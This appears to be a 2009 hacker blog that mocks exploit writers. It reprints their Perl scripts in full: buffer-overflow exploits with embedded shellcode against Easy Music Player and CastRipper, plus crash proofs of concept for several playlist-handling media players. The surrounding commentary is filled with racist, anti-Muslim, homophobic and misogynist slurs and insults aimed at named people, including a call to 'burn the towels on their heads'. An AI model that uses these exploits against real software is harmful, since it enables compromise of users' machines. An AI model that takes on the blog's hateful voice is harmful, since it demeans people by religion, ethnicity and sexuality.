Tuesday, August 11, 2009

THE GOBLIN STRIKES BACK

SHIT! SHIT!

The Nut Goblin (ThE g0bL!N) has to be the most retarded of the retards we've fucked with on this blog. He is very stupid. Some say he has a negative IQ. Some say he (or she?? once again) has nuts on his/her forehead at all times. But all know what a dumb mother fucking idiot The Nut Goblin really is.

PUNT! PUNT!

Exhibit A-Z:

A perfectly normal exploit.. almost ruined!

#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
###################################################################

Perfectly fine. JMP to mother fucking code. Now, The cum gobliner has to gay it all up with...

#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################

Even the fags at milw0rm got it wrong...

"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)" --> ITS NOT SEH FUCKUP.

You see a fucking JMP 0xXX anywhere? Debug something every once in a fucking blue moon moron.

So, milw0rm is dumb and the goblin gobbles str0ke's nuts, and they both claim it as SEH we assume ahahahahahahaahhahaa!!!!

Saturday, July 11, 2009

A DOUBLE ACTION FEATURE FROM THE GOBLIN

Main Critism: Do I even have to analyse this shit? IT IS SHIT, YOU CAN SEE THAT.

I will refer to we and I and I as we.


#!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# # M3U/M3L to ASX/WPL v1.1 (asx,m3u,m3l) Local Stack Overflow POC ##
# # Download: http://proletsoft.freeservers.com/mmb/m3utoasx.html ##
## Welcom Back Milw0rm ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');#asx,m3u,m3l)
print myfile $crash;
##################################################################################
#By ThE g0bL!N
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]

watttttttttttttttttttttttttttttttttt??????????????????

#!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# # Playlistmaker v1.5 (.M3U/M3L/Txt File) Local Stack Overflow POC ##
# # Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html ##
## Welcom Back Milw0rm ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');# M3U/M3L/Txt
print myfile $crash;
##################################################################################
#By ThE g0bL!N
#Usgae:open existing Plylis => Poc.m3u => Click On file => Boom!!!
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]


Now that your eye balls are offically bleeeeeeeeeding.. its time to take a time out.

Gobble on dese ballz goblin!

Go hunt down these idiots. I'm no fucking racists, but lets burn the towels on their heads. Everybody knows the muslim script kiddies are even worst than the .ro fags now.

We are now calling on the toothless bitches that these yellow shitting asswipes call their mothers to spank them and ground them from teh interwebz for at least 60 days. During the 60 day period, interwebz access will be restricted to emailing their favorite rappers and compiling exploits remotely via GCC_SERVER. Nothing will stop these dumbasses as we can tell, so theres nothing stopping us from blogging about the dumb shit that they do. Rely on ignorance, spread intelligence.

BRING BACK MITNICK!!!

Friday, July 10, 2009

OtsAv TV [.olf] Local Heap Overflow Poc

Main Critism: Ok, I'm only gonna post 1/3 "Heap Overflow PoCs".. trust in us, the rest are just as gay.


#!/usr/bin/perl
# OtsAv TV [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/tv/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >> Import List >> As playlist >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 00009AF0
# EDX 03A0F730
# EBX 0000042A
# ESP 03A0F9C8
# EBP 00000000
# ESI 02CD7102
# EDI 03A0FEAA
# EIP 0043C8D7 OtsAVTVt.0043C8D7
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
$A.
"\r\n";
close $ofl_playlist;
---------------------


Wow, that a total retard. "UMMM let meee post dis shiz un seee f s0m3b0dy cun XPLOIT it fer me!!!" --> Really, is that the login you want owning your servers? Is that the kind of moron you listen to but can't understand when you call major technical support hotlines? Will somebody pleaseeee shave this girl's head and sell her back to pre-school or towelhead/dish rag/mop bucket/broom head/microshit education institutes? WOAHHHHHHHHHHHHHH LIKE YEAH D00DZ

PatPlayer v3.9 (M3U File) Local Heap Overflow PoC

Main critism: You stupid kiddie fucks just won't give up. I hate you more than the new milw0rm owners. Since when is Citrix bug a web bug??


#!/usr/bin/perl
#
#
#
# PatPlayer v3.9 (M3U File) Local Heap Overflow PoC
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Greatz : All friends (Jiko :)) Sec-r1z.CoM ..... IQ-TY ....
#
#
#EAX 41414141
#ECX 00000000
#EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBX 00B928DC
#ESP 0012FD2C
#EBP 0012FD78
#ESI 004F1CCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 004EEA78 PatPlaye.004EEA78
#EIP 00404C59 PatPlaye.00404C59
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 2480; # Random

open(MYFILE,'>>cyber.m3u');

print MYFILE $Header.$ex;

close(MYFILE);


Paaaaaaaaaaaaaaaathetic.

PS. Cyber-Zone nicknamed himself that when he got "In Da Zone" when Cybering with an alaskan huskie. Go figure.

Wednesday, July 1, 2009

More Lame Shit To Have A Go At

Incase you thought we were dead.. or finished.. you thought wrong. We thought wrong. A job done well is never finished we suppose.. and we're back because so goat humping queer decided to jack up some more perl exploit bullshit... yeah, we'd love for a llama to fart on his face too.


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# # PEamp 1.02b (.M3U File) Local Stack Overflow POC ##
# # Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)


h4rh4rh4r Boom !!! like lulz like it crashed my blue screen lulz

Thursday, May 14, 2009

DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs

Main critism: SINCE WHEN DID A FUCKING CRASH BECOME A SECURITY BUG?


#####################################################################################################
# DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

#####################################################################################################
# DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3l";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";


Somebody obviously gave this bitch turrets when she was too young. She plays with dolls and playlists all day long. I speak for all Canadians by saying, "GO FUCK YOURSELF"

Tuesday, May 12, 2009

CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit

Main critism: (*DN9ysysy7F&*SSFSKK8990ol;lIO89980`*BANGS HEAD ON KEYBOARD*89&*n7``jnsdfd8u9d89udsf83ffdfd***BREAKS KEYBOARD***


#!/usr/bin/perl
# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Exploited By : zAx
# ThE-zAx@HoTMaiL.CoM
print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n";
print "Exploited By : zAx";
print "Contact at : ThE-zAx@HoTMaiL.CoM";
$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
$junk = "\x41" x 26369;
$eip="\x7D\xBC\x01\x10"; # Universal
$nopsled = "\x90" x 10;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
open(zax,">>zAx.pls");
print zax $header.$junk.$eip.$nopsled.$shellcode;
print "[+] Done !! [+]";
close(zax);


You cum guzzling metasploit ripping faggots! You probably don't even know the difference between INTEL and POWERPC chips! I HOPE MICROSHIT ADDS REAL BUFFER OVERFLOW PROTECTION JUST SO I DONT HAVE TO SLIT MY WRISTS EVERYTIME I SEE YOUR LAME TRIAL AND ERROR BULLSHIT EXPLOITS ON MILH0USE!

NO NO NO THAT STILL WONT HELP, THEN YOU'LL JUST NEVER UPGRADE AND PUT DISCLAIMERS ON THE LAME FUCKING EXPLOITS LIKE "hey im musLIM this only workZ ON WINDOWS XP SP3 NOT 4 OR 5 OR 6 OR 7 OR 8 BECAUSE IM TOO FUCKING STUPID AND I RUIN EVERYTHING MY MOTHER FUCKED A GOAT YEAH SHE DID I FUCKED MY BROTHER AND SISTER IM A FUCKHEAD ARG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" Or something of that fucking nature bitchass towelheadZ!!!